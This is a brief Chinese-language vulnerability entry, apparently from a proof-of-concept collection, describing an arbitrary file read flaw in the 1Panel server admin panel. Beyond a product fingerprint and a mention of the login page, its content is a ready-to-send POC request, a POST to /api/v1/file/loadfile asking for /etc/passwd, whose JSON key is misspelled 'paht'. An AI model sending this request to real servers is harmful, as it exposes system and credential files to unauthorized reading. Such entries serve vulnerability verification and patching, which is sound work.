1Panel 后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件
1Panel
"1Panel"
登陆页面
验证POC
POST /api/v1/file/loadfile {"paht":"/etc/passwd"}
